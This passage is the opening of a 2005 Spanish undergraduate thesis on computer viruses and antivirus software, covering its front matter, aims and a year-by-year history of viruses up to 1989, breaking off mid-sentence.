MONOGRAFÍA TEORÍA E INVESTIGACIÓN DE VIRUS Y ANTIVIRUS

OSCAR ANDRÉS LÓPEZ NESTOR LEÓN SANTIBÁÑEZ

UNIVERSIDAD TECNOLÓGICA DE PEREIRA FACULTAD DE INGENIERÍAS INGENIERÍA DE SISTEMAS Y COMPUTACIÓN PEREIRA 2005

MONOGRAFÍA TEORÍA E INVESTIGACIÓN DE VIRUS Y ANTIVIRUS

OSCAR ANDRÉS LÓPEZ NESTOR LEÓN SANTIBÁÑEZ

Proyecto de grado para optar al título de Ingeniero de Sistemas y Computación

Director Omar Ivan Trejos Ingeniero de Sistemas Decano Facultad de Ingenierías Universidad Tecnológica de Pereira.

UNIVERSIDAD TECNOLÓGICA DE PEREIRA FACULTAD DE INGENIERÍAS INGENIERÍA DE SISTEMAS Y COMPUTACIÓN PEREIRA 2005

2

Nota de aceptación

Presidente del Jurado

Jurado

Jurado

Pereira, _____ de ______________ de 2005

3

DEDICATORIA

4

CONTENIDO Pág. INTRODUCCIÓN 1. PLANTEAMIENTO DEL PROBLEMA 2. JUSTIFICACIÓN 2.1. ACADÉMICA 2.2. TÉCNICA 2.3. SOCIAL 2.4. HUMANÍSTICA 3. OBJETIVOS 3.1. OBJETIVO GENERAL 3.2. OBJETIVOS ESPECÍFICOS 4. HISTORIA DE LOS VIRUS 4.1. AÑOS 1939-1949 4.2. AÑO 1974 4.3. AÑO 1980 4.4. AÑO 1981 4.5. AÑO 1983 4.6. AÑO 1984 4.7. AÑO 1986 4.8. AÑO 1987 4.9. AÑO 1988 13 14 15 15 15 16 16 17 17 17 18 18 18 19 19 20 20 20 21 22

5

4.10. AÑO 1989 4.11. AÑO 1990 4.12. AÑO 1991 4.13. AÑO 1992 4.14. AÑO 1993 4.15. AÑO 1995 4.16. AÑO 1999 4.17. QUE ES UN VIRUS INFORMÁTICO 4.17.1 Otras definiciones. 4.18. QUE PUEDE HACER UN VIRUS 4.19. CÓMO SE ADQUIERE UN VIRUS 4.20. QUÉ HACEN LOS VIRUS 4.21. LAS NUEVAS INCURSIONES DE LOS VIRUS 5. TEORÍA Y FUNCIONALIDAD DE LOS VIRUS 5.1. QUIEN HACE LOS VIRUS 5.2. PROPIEDADES DE LOS VIRUS 5.3. TIPOS DE VIRUS 5.3.1 Virus Macros. 5.3.2 Virus que infectan rápido/lento (Fast/Slow). 5.3.3 Virus que infectan esporádicamente (Sparse). 5.3.4 Virus furtivo ó Stealth. 5.3.5 Virus polimórfico. 5.3.6 Virus cifrado (Encrypted). 5.3.7 Virus acompañante (Companion). 5.3.8 Virus blindado (Armored). 5.3.9 Virus de hueco (Cavity). 5.3.10 Virus (Tunnelling). 5.4. CLASIFICACIÓN DE LOS VIRUS 5.4.1 Virus.

23 25 26 28 29 30 31 31 31 32 32 32 32 34 34 35 35 36 37 37 37 38 38 39 39 39 39 40 40

6

5.4.2 Troyano. Arquitectura de un Troyano. Programa Servidor. Programa Cliente. Programa Editor. Como funcionan. 5.4.3 Gusano. Cómo se propagan los gusanos y otros tipos de virus. Cómo saber si se tiene un gusano u otro tipo de virus. 5.4.4 Puertas traseras. 5.4.5 Bomba lógica o Bomba de Tiempo. 5.4.6 Spam. 5.4.7 Hoax. 5.5. OTRAS AMENAZAS 5.6. LA VIDA DE UN VIRUS 5.6.1 El contagio. 5.6.2 La incubación. 5.6.3 La replicación. 5.6.4 El ataque. 5.7. FORMAS DE INFECCIÓN 5.8. DONDE SE OCULTAN LOS VIRUS 5.9. COMO SABER SI SE TIENE UN VIRUS 5.10. CÓMO SE IMPIDE LA INFECCIÓN DE UN VIRUS 6. CREANDO UN VIRUS 6.1. NOMENCLATURA DE LOS NOMBRES DE VIRUS 6.2. El REGISTRO DE WINDOWS 6.3. QUE SON LAS API 6.3.1 Qué es el API win32. 6.3.2 Que son las librerías Dinámicas (DLLs). 6.4. INICIO Y FINAL DE UN CÓDIGO EN VISUAL BASIC 6.5. SUBRUTINAS 6.6. FileCopy

40 41 41 41 41 41 42 43 43 44 46 48 50 52 52 52 53 53 53 53 55 56 56 58 58 59 61 61 62 63 65 65

7

6.7. App.EXEName. 6.8. ON ERROR RESUME NEXT 6.9. CREAR ARCHIVOS TXT 6.10. MINUTE(NOW) 6.11. SECOND(NOW) 6.12. OCULTAR EL FORMULARIO DEL PROGRAMA 6.13. CÓDIGO EN VB DE UN WORM RESIDENTE 7. EL FUTURO DE LOS VIRUS 7.1. EL SISTEMA OPERATIVO SYMBIAN 7.2. LOS VIRUS EN CELULARES 7.2.1. Troyanos en celulares. 7.2.2. Cómo neutralizar los ataques. 7.2.3. Seguridad en los celulares. 7.2.4. Hackers en los celulares. 7.2.5. Antivirus para los celulares. 7.2.6. Virus para celulares que afectan a PCs. 7.3. VIRUS EN LINUX 7.3.1 Bombas Lógicas. 7.3.2 Caballos de Troya. 7.3.3 Gusanos. 7.3.4 Puertas Traseras. 7.4. VIRUS EN LAS PDAS 7.4.1 Seguridad en dispositivos inalámbricos. 7.4.2 Antivirus en las PDAs. 8. TEORÍA DE ANTIVIRUS 8.1. DEFINICIÓN DE ANTIVIRUS 8.2. ESTRUCTURA DEL PROGRAMA ANTIVIRUS 8.2.1 Módulo de identificación o de control. 8.2.2 Módulo de respuesta. 8.3. TÉCNICAS PARA LA DETECCIÓN DE VIRUS INFORMÁTICOS

65 66 66 67 68 69 70 71 76 79 80 81 81 83 86 87 87 90 92 93 94 97 100 101 103 103 105 105 105 105

8

8.3.1 8.3.2 8.3.3 8.3.4

Scanning o rastreo. Comprobación de suma o CRC (Ciclyc Redundant Check). Programas de vigilancia. Búsqueda heurística.

105 106 106 106 108 109 109 110 110 110 110 111 112 112 113 115 116 117 118 120 121 121 121 122 122 123 124 124 124 125 125 125 127 128

8.4. EVALUACION DE SOFTWARE ANTIVIRUS 8.4.1 Pruebas de antivirus de mayor aceptación. Certificación ICSA. La ICSA (Internacional Computer Security. Westcoast Labs Checkmark. Prueba VTC Malware de la Universidad de Hamburg. Universidad de Magdeberg. Virus Bulletin. 8.4.2 Por qué los sistemas de evaluación de antivirus deben Evolucionar. 8.5. VALORACIÓN DE DIFERENTES CLASES DE SOFTWARE ANTIVIRUS 8.5.1 Norton Antivirus. 8.5.2 McAFEE VIRUS SCAN. 8.5.3 Sophos. 8.5.4 Norman Virus Control. 8.5.5 Panda Platinum. 8.5.6 F-Secure. 8.5.7 PC-cillin. 8.5.8 AVP. 8.6. FUTURO DE LOS SISTEMAS ANTIVIRUS 8.6.1 Estado del arte de los antivirus como justificación para la creación de un modelo híbrido. 8.6.2 Modelo Hibrido. Habilidad para detectar virus desconocidos. Generación de inmunidad. Velocidad de respuesta. Robustez. Seguridad, disponibilidad y facilidad de uso. 9. PROGRAMAS DE SEGURIDAD 9.1. SOFTWARE DE SEGURIDAD 9.2. SOFTWARE ANTISPAM 9.3. SOFTWARE ANTISPAM COMO HERRAMIENTA EN LA LUCHA CONTRA EL SPAM

9.4. LIMITACIONES DE UN FIREWALL

9

9.5. HONEYPOTS Y HONEYNETS 9.6. SOFTWARE ANTISPY 10. CONCLUSIONES BIBLIOGRAFÍA ANEXO A. INFECCIÓN DE EJECUTABLES ANEXO B. INFECCIÓN DE ZIP’s ANEXO C. PROGRAMAS CON SPYWARE ANEXO D. LISTADO DE PUERTOS POR LOS QUE SE COMUNICAN LOS TROYANOS

128 130 131 133 139 143 146 154

10

LISTADO DE TABLAS Pág. Tabla 1. Capa de software Tabla 2. Virus en Linux Tabla 3. Gusanos en Linux 78 89 93

11

LISTADO DE FIGURAS Pág. Figura 1. Ventana de Regedit Figura 2. Salida MsgBox Figura 3. Form Figura 4. Firma del Worm Figura 5. Ventana de propiedades Figura 6. Pérdidas reportadas por incidentes de seguridad Figura 7. Ubicación de un Firewall 60 64 64 67 69 74 127

12

INTRODUCCIÓN La mayoría de las personas no tienen claridad en cuanto al concepto de virus, qué es un virus? Por qué es llamado virus? Muchas veces esta falta de información convierte a los usuarios en blancos fáciles de los ataques con código nocivo, la falta de información es también un problema cuando hablamos de software antivirus, debido a que una mala configuración, o simplemente la falta de actualizaciones a tiempo pueden disminuir considerablemente la efectividad de estos. Este proyecto presenta el resultado de una labor de investigación en la que se resumió la información más importante con respecto a los virus y a los antivirus. Desde que se empezaron a desarrollar los virus de computador han evolucionado muy rápidamente, esta evolución puede ser documentada año por año teniendo en cuenta los “aportes” realizados por una gran cantidad de personas y entidades alrededor del mundo, con el paso del tiempo los virus informáticos se han transformado en una amenaza de grandes proporciones. Es el carácter grave de esta amenaza la que ha dado nacimiento a una gran industria, la industria del software anti-virus la cual se encuentra cada día con retos mayores en términos de código nocivo para ser detectado y eliminado de diversos sistemas. En este trabajo se presenta una proyección al futuro de estos sistemas y la forma en que deberían responder a las amenazas del mañana. Con herramientas encontradas en la red se creó un Worm básico para ilustrar las rutinas sencillas que son necesarias para crear estas rutinas de código infecciosas y nocivas. Se pretende mostrar de manera sencilla las formas en que un equipo puede ser atacado por un Worm en un lenguaje tan común y comercial como el Visual Basic. El proyecto no pretende mostrar un virus completamente funcional, solo presentar un bosquejo, un virus sencillo con las funciones más básicas. Este proyecto se divide en 6 partes, iniciando con la documentación de la historia de los virus, continuando con la descripción o “anatomía” del virus informático y las diferentes variedades de código nocivo que se encuentran en la actualidad. Después se muestra el funcionamiento de un virus en la parte practica para luego presentar información sobre lo que los virus podrían ser en futuro. La ultima parte presenta, explica y evalúa los sistemas de seguridad disponibles actualmente.

13

1. PLANTEAMIENTO DEL PROBLEMA El propósito de realizar este proyecto es el hecho de que no se cuenta con disponibilidad en la información en el tema de los virus informáticos donde se halle documentación con alguna profundidad, acerca de la lógica de los Virus, su funcionamiento y complejidad para así poder entender el alcance que estos programas pueden llegar a tener y poder captar una radiografía de aquellos programas que en el día a día de nuestras labores están en función de causar daño a nuestra información y equipos. Actualmente la creación de los virus informáticos ha aumentado considerablemente, en el pasado se hablaba de un aumento del 50% en la cantidad de virus cada cinco o nueve meses, hoy en día se escriben dos o tres virus nuevos diariamente (según Vechelin Bontchev de la Universidad de Hamburgo en Alemania en su articulo Futuras tendencias en la escritura de virus ). Un factor que ha contribuido al incremento de la cantidad de virus es la existencia de programas para crearlos, existen programas como VCS, MtE y VCL que le proporcionan una interfaz amigable a cualquier persona que desee crear un virus sin que esta tenga conocimiento sobre programación a bajo nivel. Estos programas crean código fuente “nocivo” y el usuario bien puede utilizar el recién creado virus o estudiar su código fuente para encontrar ideas que le ayuden a escribir los propios en el futuro. Los virus son y siempre serán una realidad presente, desde un simple usuario de correo electrónico, que no entiende por qué su equipo sigue bloqueándose, hasta un administrador de red que trata de solucionar el desperdicio de recursos y la sobrecarga que determinado virus ha provocado en su red. Los creadores de antivirus invierten muchos recursos en investigar y encontrar la solución para cada virus nuevo reportado en el mundo. No se trata de desarrollar el software antivirus más poderoso, es bien sabido que los virus son temidos por mucha gente pero conocidos por muy poca, muchos no saben siquiera donde comienza o donde termina el concepto de virus y aun menos personas que tienen una definición adecuada del programa nocivo.

14

2. JUSTIFICACIÓN 2.1 ACADÉMICA Una búsqueda sobre el tema de virus informáticos en cualquier Biblioteca hace evidente la falta de documentación que existe sobre el tema, unos cuantos artículos de revistas y algunos libros con información muy general es lo único que se puede encontrar. El resultado de esta misma búsqueda en un portal de Internet arrojará como resultado una gran cantidad de archivos de texto, .Doc, Pdf, etc. con información desorganizada. Es posible encontrar algo de información útil aquí y allá, pero no existe un documento que desnude completamente a un virus, que presente una radiografía de estos programas nocivos para muchas personas pero conocidos a profundad por tan poca. Analicemos el caso particular del pénsum de Ingeniería de Sistemas en la U.T.P. más específicamente las asignaturas Sistemas Operativos I y Sistemas Operativos II, en esta última se estudian los llamados Sistemas Operativos Distribuidos los cuales funcionan en un ambiente que es muy vulnerable a un ataque de un programa nocivo, por supuesto muchos conceptos fueron tratados y estudiados hasta cierto punto en la asignatura, pero nunca se estudió la anatomía de este atacante silencioso. Es por eso que se considera necesario crear un documento donde se estudie un virus, un documento completo que explique cómo funcionan estos programas y que ilustre también la forma en que son combatidos por el software anti-virus tan popular hoy en día. La fuente de información que se planea crear, documentando paso a paso la creación y funcionamiento de un virus servirá como un recurso para que estudiantes de las asignaturas arriba mencionadas (y muchas otras quizá) comprendan como es afectado un sistema operativo por un programa nocivo, así como también servirá de plataforma para futuras investigaciones en el campo. 2.2 TÉCNICA Basados en un trabajo de monografía, el tema de los virus es algo que concierne a todas las personas que están vinculadas al medio de la información, por este motivo se analizará la lógica y funcionamiento de estos programas ya que se va ha trabajar para que exista un entendimiento de cómo funcionan aquellos programas nocivos para la información y posteriormente se creara un prototipo de virus con el que se podrá experimentar en un ambiente computacional sin correr el riesgo de la pérdida de información o el daño permanente de equipos, un programa con las características de un virus, con fines didácticos y cuyo objeto malicioso va ser reemplazado por una labor simple como la de establecer un mensaje amigable en pantalla. Todos los virus disponibles en este momento han sido creados con fines nocivos, por esto se planea proveer una herramienta de estudio experimental que puede mostrarse útil para tareas como poner a prueba la seguridad de un sistema de cómputo, o simplemente mostrarle al estudiante

15

promedio (no al genio informático) el concepto de software nocivo en un ambiente práctico. 2.3 SOCIAL Existe la necesidad en la comunidad informática de las universidades de tener una documentación donde se encuentre información que ayude a entender la creación y el funcionamiento de los programas virus donde la comunidad pueda adquirir un conocimiento acerca de la capacidad que tienen dichos programas, como están construidos y de que forma son capaces de entrar en una red, pasando luego a las estaciones de trabajo causando daños y estragos. Con este proyecto se podrá tener una percepción más amplia de lo que hoy en día es un tema tan importante como la seguridad informática donde se tiene que en las grandes empresas año tras año necesitan que sus sistemas de información estén protegidos para evitar una perdida de información o de tiempo. Es importante establecer una documentación que nos enseñe y nos ayude a comprender un campo de la informática que se ha convertido en un tema exclusivo de quienes crean estos códigos maliciosos colocando una cortina que impide ver las debilidades o fortalezas que tienen estos programas, ayudando así a que los usuarios puedan comprender como trabajan, y de esta forma tener una percepción más clara en todo lo que tiene que ver con la seguridad informática. 2.4 HUMANÍSTICA En el mundo el tema de seguridad informática ha venido tomando fuerza en los últimos años, gracias a que hoy por hoy solo se necesita de un computador y una línea telefónica o hasta un celular para conectarse con el mundo, pero además ser victimas de aquellas personas que con programas o anuncios engañosos logran irrumpir en nuestra seguridad ocasionando problemas, pero aparte de esto cuentan con que la mayoría de las personas no saben como defenderse de dichos ataques, simplemente en el momento que observan un comportamiento sospechoso en sus equipos logran entender que su seguridad ha sido violada o que necesitan de un técnico para volver a recuperar sus equipos, queremos que con el proyecto las personas entiendan que el tema de seguridad es importante mostrando la otra cara del problema para que sean más precavidos y a que tomen medidas que ayuden a contrarrestar las posibles falencias en seguridad que tengan sus sistemas, aclarando un poco la idea de lo que son estos programas, ya que no van ha dejar de existir a menos que todas las personas tengamos un concepto de seguridad tan arraigado que estos no tengan como propagarse, por esto se quiere que se tome conciencia de lo importante que es la seguridad en los sistemas de información. Mostrando una documentación donde alberguemos toda la información necesaria para que las personas cuenten con información acerca de estos programas.

16

3. OBJETIVOS 3.1 OBJETIVO GENERAL Desarrollar un documento organizado y estructurado que permita Crear una fuente de información y conocimiento de los virus y antivirus. 3.2 OBJETIVOS ESPECÍFICOS a) Determinar el estado del arte de los virus y antivirus estableciendo una fuente del conocimiento. b) Crear documentación de la teoría de virus. c) Crear documentación de la teoría de antivirus. d) Explicar mediante ejemplo un prototipo de virus.

17

4. HISTORIA DE LOS VIRUS 4.1 AÑOS 1939-1949 En 1939, el famoso científico matemático John Louis Von Neumann, de origen húngaro, escribió un artículo, publicado en una revista científica de New York, exponiendo su "Teoría y organización de autómatas complejos", donde demostraba la posibilidad de desarrollar pequeños programas que pudiesen tomar el control de otros, de similar estructura. En 1949, en los laboratorios de la Bell Computer, subsidiaria de la AT&T, tres jóvenes programadores: Robert Thomas Morris, Douglas McIlory y Víctor Vysottsky, a manera de entretenimiento crearon un juego al que denominaron CoreWar, inspirados en la teoría de John Von Neumann, escrita y publicada en 1939. Robert Thomas Morris fue el padre de Robert Tappan Morris, quien en 1988 introdujo un virus en ArpaNet, la precursora de Internet. Puesto en la práctica, los contendores del CoreWar ejecutaban programas que iban paulatinamente disminuyendo la memoria del computador y el ganador era el que finalmente conseguía eliminarlos totalmente. Este juego fue motivo de concursos en importantes centros de investigación como el de la Xerox en California y el Massachussets Technology Institute (MIT), entre otros. Sin embargo durante muchos años el CoreWar fue mantenido en el anonimato, debido a que por aquellos años la computación era manejada por una pequeña élite de intelectuales. A pesar de muchos años de clandestinidad, existen reportes acerca del virus Creeper, creado en 1972 por Robert Thomas Morris, que atacaba a las famosas IBM 360, emitiendo periódicamente en la pantalla el mensaje: "I'm a creeper... catch me if you can!" (Soy una enredadera, agárrenme si pueden). Para eliminar este problema se creó el primer programa antivirus denominado Reaper (segadora), ya que por aquella época se desconocía el concepto del software antivirus (Machado, 2005)38. 4.2 AÑO 1974 El virus Rabbit hacía una copia de si mismo y lo situaba dos veces en la cola de ejecución del ASP de IBM lo que causaba un bloqueo del sistema; en el mismo año la Xerox Corporation presentó en Estados Unidos el primer programa que contenía un código auto duplicador (Datacraft, 2005)16. 4.3 AÑO 1980

18

La red ArpaNet del ministerio de Defensa de los Estados Unidos de América, precursora de Internet, emitió extraños mensajes que aparecían y desaparecían en forma aleatoria, así mismo algunos códigos ejecutables de los programas usados sufrían una mutación. Los altamente calificados técnicos del Pentágono se demoraron 3 largos días en desarrollar el programa antivirus correspondiente. Hoy día los desarrolladores de antivirus resuelven un problema de virus en contados minutos (Machado, 2005)38. 4.4 AÑO 1981 Los Equipos Apple II se vieron afectados a fines de 1981 por un virus llamado Cloner que presentaba un pequeño mensaje en forma de poema. Se introducía en los comandos de control e infectaba los disco cuando se hacia un acceso a la información utilizado por el comando infectado (Datacraft, 2005)16. En Agosto de 1981 la International Business Machine lanza al mercado su primera computadora personal, simplemente llamada IBM PC. Un año antes, la IBM habían buscado infructuosamente a Gary Kildall, de la Digital Research, para adquirirle los derechos de su sistema operativo CP/M, pero éste se hizo de rogar, viajando a Miami donde ignoraba las continuas llamadas de los ejecutivos del "gigante azul". Es cuando oportunamente surge Bill Gates, de la Microsoft Corporation y adquiere a la Seattle Computer Products, un sistema operativo desarrollado por Tim Paterson, que realmente era un "clone" del CP/M. Gates le hizo algunos ligeros cambios y con el nombre de PC-DOS se lo vendió a la IBM. Sin embargo, Microsoft retuvo el derecho de explotar dicho sistema, bajo el nombre de MSDOS. El nombre del sistema operativo de Paterson era "Quick and Dirty DOS" (Rápido y Rústico Sistema Operativo de Disco) y tenía varios errores de programación (bugs). La enorme prisa con la cual se lanzó la IBM PC impidió que se le dotase de un buen sistema operativo y como resultado de esa imprevisión todas las versiones del llamado PC-DOS y posteriormente del MS-DOS fueron totalmente vulnerables a los virus, ya que fundamentalmente heredaron muchos de los conceptos de programación del antiguo sistema operativo CP/M, como por ejemplo el PSP (Program Segment Prefix), una rutina de apenas 256 bytes, que es ejecutada previamente a la ejecución de cualquier programa con extensión EXE o COM (Machado, 2005)38.

4.5 AÑO 1983

19

Keneth Thompson, quien en 1969 creó el sistema operativo UNIX, resucitó las teorías de Von Neumann y la de los tres programadores de la Bell y en 1983 siendo protagonista de una ceremonia pública presentó y demostró la forma de desarrollar un virus informático (Machado, 2005)38. 4.6 AÑO 1984 En mayo de 1984 la revista Scientific American, en el que Dewdney describió el funcionamiento de los programas "Core War" e incluso ofreció una copia del programa contra reembolso de dos dólares. Estos artículos siguieron publicándose durante años bajo el título genérico de "Computer Recreations". El Dr. Fred Cohen al ser homenajeado en una graduación, en su discurso de agradecimiento incluyó las pautas para el desarrollo de un virus. Este y otros hechos posteriores lo convirtieron en el primer autor oficial de los virus, aunque hubo varios autores más que actuaron en el anonimato. El Dr. Cohen ese mismo año escribió su libro "Virus informáticos: teoría y experimentos", donde además de definirlos los califica como un grave problema relacionado con la Seguridad Nacional. Posteriormente este investigador escribió "El evangelio según Fred" (The Gospel according to Fred), desarrolló varias especies virales y experimentó con ellas en un computador VAX 11/750 de la Universidad de California del Sur. La verdadera voz de alarma se dio en 1984 cuando los usuarios del BIX BBS, un foro de debates de la ahora revista BYTE reportaron la presencia y propagación de algunos programas que habían ingresado a sus computadoras en forma subrepticia, actuando como "caballos de troya", logrando infectar a otros programas y hasta el propio sistema operativo, principalmente al Sector de Arranque. Al año siguiente los mensajes y quejas se incrementaron y fue en 1986 que se reportaron los primeros virus conocidos que ocasionaron serios daños en las IBM PC y sus clones (Machado, 2005)38. 4.7 AÑO 1986 En este año, Basit y Amjad se percataron de que el sector boot de un diskette contenía código ejecutable, y que este código corría siempre que se reiniciaba el PC con un diskette en A:\ ambién se dieron cuenta de que podía reemplazar código con su propio programa, pudiendo ser éste un programa en la memoria residente, y que podía instalar una copia de sí mismo en cada diskette, accesible desde cualquier dispositivo. Como el programa se copiaba a sí mismo, le dieron el nombre de 'virus', por su semejanza con los virus biológicos. Este proyecto de virus solamente infectó 360Kb de diskettes. También en 1986, un programador llamado Ralf Burger vio que un archivo podía hacer una copia de sí mismo por el método simple de atacharla en otros archivos.

20

Entonces desarrolló una demostración de este efecto, que llamó 'Virdem'. Lo distribuyó en la 'Chaos Computer Conference' de diciembre de ese año, en la cual el tema principal eran precisamente los virus. La demostración tuvo tanto éxito que Burger escribió un libro sobre el tema, en el que no se mencionaba aún a los virus del sector de arranque (Virusprot.com, 2005)63. En ese año se difundieron los virus (c) Brain, Bouncing Ball y Marihuana y que fueron las primeras especies representativas de difusión masiva. Estas 3 especies virales tan sólo infectaban el sector de arranque de los diskettes, posteriormente aparecieron los virus que infectaban los archivos con extensión EXE y COM (Machado, 2005)38. 4.8 AÑO 1987 Se da el primer caso de contagio masivo de computadoras a través del MacMag virus también llamado Peace, virus sobre computadoras Macintosh. Este virus fue creado por Richard Brandow y Drew Davison y lo incluyeron en un disco de juegos que repartieron en una reunión de un club de usuarios. Uno de los asistentes, Marc Canter, consultor de Aldus Corporation, se llevó el disco a Chicago y contaminó la computadora en el que realizaba pruebas con el nuevo software Aldus Freehand, el virus contaminó el disco maestro que fue enviado a la empresa fabricante que comercializó su producto infectado por el virus (Geocities, 2005)28. En el mismo año la Universidad de Delaware se dio cuenta de que tenía un virus, cuando empezaron a ver una extraña y sospechosa 'etiqueta' que aparecía en los diskettes. Y eso es todo lo que este pequeño virus hacía (auto replicarse y colocar una 'etiqueta'). La alerta la dio una empleada de soporte técnico de la misma Universidad, que advirtió de que estaba encontrando la 'etiqueta' en muchos de los diskettes. Mientras tanto, en los Estados Unidos Fred Cohen acababa de completar su tesis doctoral, que versaba precisamente sobre los virus informáticos. El doctor Cohen demostró que uno no puede escribir un programa que sea capaz de, con un cien por ciento de aciertos, visualizar un archivo y decidir si es o no un virus. Desde luego, nadie pensó jamás en esa posibilidad, pero Cohen hizo buen uso de un teorema matemático, y así fue como se ganó el doctorado. Sus experimentos sobre la difusión de virus en los sistemas informáticos demostraron que la expansión de las infecciones resultaba ser mucho más rápida de lo que nadie hubiera esperado. Cohen visitó la Universidad Lehigh, y allí se encontró con Ken van Wyk. De este encuentro surgió el virus 'Lehigh', que nunca abandonó el laboratorio, porque sólo podía infectar COMMAND.COM y dañar increíblemente su host después de tan sólo cuatro replicaciones. Una de las reglas básicas sobre los virus es que aquel de ellos que dañe de forma muy rápida su host, no sobrevive durante mucho

21

tiempo. De todas formas, el virus Lehigh se hizo muy popular, y fomentó la aparición del grupo de noticias sobre virus de Ken van Wyk en Usenet (Virusprot.com, 2005)63. Se descubre la primera versión del virus "Viernes 13" en los ordenadores de la Universidad Hebrea de Jerusalén (Geocities, 2005)28. En 1987 La IBM fue atacada por un virus que hizo que se volviera lento, muy lento, tanto que paralizo por 72 horas el sistema de mensajes de correo interno de dicha empresa, este virulento amigo presentaba un mensaje con una imagen de un arbolito navideño y pedía que tecleara la palabrita "CHRISTMAS" y si se negaba se apagaba la PC y para remate impedía que guarde los trabajos realizados y se perdía muchas horas de estar frente al monitor y presionado teclas. Y si tecleaba la palabrita se introducía a la lista de correo y este se diseminaba por la red (Datacraft, 2005)16. 4.9 AÑO 1988 El año en el que comenzaron a aparecer los fabricantes de anti-virus, creando una moda de lo que en principio sólo era un problema potencial. Los vendedores de software anti-virus eran pequeñas compañías, que ofrecían sus productos a muy bajo precio, en algunos casos gratuitamente. Fue en este año cuando la compañía IBM se dio cuenta de que tenía que tomarse el asunto de los virus completamente en serio. Esta conclusión no la tomarón debido a la incidencia del popular 'gusano del árbol de Navidad', de amplia difusión, sino porque IBM sufrió un brote del virus 'Cascade', y se encontró en la embarazosa necesidad de tener que comunicar a sus clientes que ellos también habían sido infectados. Desde este momento, el 'High Integrity Laboratory' de IBM fue el encargado del área virus. En aquel momento, cada nueva aparición de virus provocaba la aplicación de un análisis paso-a-paso. El software existente era utilizado para detectar virus de sector de arranque, y solamente fue escrito un programa anti-virus, de manera excepcional, para afrontar los rebrotes de 'Cascade' y 'Jerusalem' (Virusprot.com, 2005)64. El usar programas originales siempre son mencionados como libres de virus ; sin embargo, la empresa Aldus Corporation lanzo al mercado productos con virus begninos, tales productos eran Free Hand para Macintosh, MacMag ó Brandow; este virus presentaba un mensaje de Paz y fue introducido para celebrar el aniversario de Macintosh II, el 2 de marzo de 1988. Este virulento amigo recibió el nombre de "virus macintosh peace" y se cree que apareció el mensaje 350000 en pantallas de PC´s entre EE:UU. Y Canadá , se difundió por muchos servicios de software compartido. Richard R. Brandow, editor de la revista MacMag de Montreal, Canadá contrató a un programador para realizar el mencionado virus, que pronto se propago por

22

medio de los servicios de cartelera electrónica - [Bulletin Board Systems (BBS)] (que son sistemas de servicio de software o información compartida por computadora vía módem). La Defensa de Aldus se baso que la infección partió de un disco infectado que utilizaron de demostración que proporciono un proveedor y que este adquirió el virus en un programa de juegos de la -[Bulletin Board Systems (BBS)] - y sin saberlo se incluyo en el programa y los que diseminaron el virus fueron las copias ilegales. En 1988 se identifico el virus "Jerusalem" que según algunas versiones, fue creado por la Organización para la Liberación de Palestina. Con motivo de la celebración del 40 aniversario del ultimo día en que Palestina existió como nación, el viernes 13 de mayo de 1988 (Datacraft, 2005)16. El 2 de Noviembre de 1988 Robert Tappan Morris, hijo de uno de los precursores de los virus y recién graduado en Computer Science en la Universidad de Cornell, difundió un virus a través de ArpaNet, (precursora de Internet) logrando infectar 6,000 servidores conectados a la red. La propagación la realizó desde uno de los terminales del MIT (Instituto Tecnológico de Massachussets). Cabe mencionar que el ArpaNet empleaba el UNIX, como sistema operativo. Robert Tappan Morris al ser descubierto, fue enjuiciado y condenado en la corte de Syracuse, estado de Nueva York, a 4 años de prisión y el pago de US $ 10,000 de multa, pena que fue conmutada a libertad bajo palabra. (Udec, 2005)62. 4.10 AÑO 1989 Será siempre recordado como el año en el que las cosas se pusieron difíciles. El virus 'Fu Manchú' (una modificación del 'Jerusalem') fue difundido por alguien anónimo en el Reino Unido, junto con el '405'. Por otra parte, los búlgaros y los rusos empezaron a interesarse por el tema. En marzo de este año, un pequeño incidente fue el aviso de la gran avalancha que se avecinaba: en Holanda, un tal Fred Vogel contactó con Alan Solomom, para contarle que había encontrado un virus nuevo en su disco duro, llamado 'Datacrime', y que estaba preocupado porque al parecer, su fecha de activación estaba prevista para el día 13 del mes siguiente. Cuando el virus fue analizado, sin embargo, se llegó a la conclusión de que, cualquier día después del 12 de octubre de 1989, podría formatear a bajo nivel el cilindro cero del disco duro, lo cual en la mayoría de los discos, borraría la FAT, dejando al usuario sin su información. También se desplegaba un mensaje con el nombre del virus, 'Datacrime'. Se redactó un informe sobre los efectos de este virus, que se publicó en una revista, y otros medios de comunicación se hicieron eco del caso, llegando en

23

Junio a la errónea conclusión de que este virus se activaría cada 12 de octubre, cuando en realidad podría activarse cualquier día entre el 12/10 y el 31/12 y era capaz de borrar toda la información contenida en el disco duro. En Norteamérica, la prensa empezó a llamarle 'El virus del Descubrimiento', y se corrió la voz de que había sido escrito por terroristas noruegos, hartos de que se otorgara la autoría del Descubrimiento de América a Colón, en vez de a Erik el Rojo (Virusprot.com, 2005)65. La policía empezó a distribuir un detector del virus 'Datacrime', vendiéndolo a un dólar en todas las comisarías de policía. Se vendió muy bien, pero daba una serie de falsas alarmas, por lo que enseguida fue sustituido por una segunda versión. Esto provocó mucha confusión en la opinión pública, porque realmente nadie era capaz de saber si tenía o no el virus. En el mes de Julio, debido al mayor índice de concienciación ciudadana, un gran número de compañías holandesas solicitaron información a IBM sobre si los virus eran realmente un problema serio. Existían muchas posibilidades de que una empresa pudiera infectarse de 'Datacrime', 'Jerusalem', 'Cascade' o 'Stoned'. IBM contaba con un programa software de detección y eliminación de virus para su uso interno, que si no ofrecían inmediatamente a sus clientes, podía representar un menoscabo en su reputación. Los técnicos sabían que en cualquier momento podría producirse una infección masiva de cualquiera de estos virus, en especial de 'Datacrime'. En septiembre de 1989, IBM lanzó su versión 1.0 de este escáner, junto con una carta en la que explicaba a sus clientes lo que era y para qué servía. Las empresas usaron el software, y se encontraron con que no estaban infectados por 'Datacrime', pero sí por multitud de versiones de los virus vigentes en ese momento (Virusprot.com, 2005)65. Por otro lado el New York Times anuncio el 30 de octubre que las computadoras de la NASA habían sido interferidas por desconocidos y causando problemas en el lanzamiento del Atlantis, más de 60 PC´s fueron infectadas esa ocasión y el intruso se siguió multiplicándose por medio de la red comercial de la NASA con empresas privadas del dicho país. Se estima que dicho banco de datos internacionales llegaría a más de medio millón de PC´s infectadas. (Datacraft, 2005)16. Este año tan agitado terminó con la distribución de 20.000 copias de un famoso código malicioso, el Aids Information Diskette, que fueron enviadas por correo a usuarios que figuraban en bases de datos de diversos organismos, por ejemplo el PC Business World. Este documento contenía instrucciones de instalación detalladas que originaban la creación de archivos y directorios ocultos, editando el contenido de AUTOEXEC.BAT, de modo que uno de estos archivos estaba presente en cada motor de arranque. El Ttroyano' que 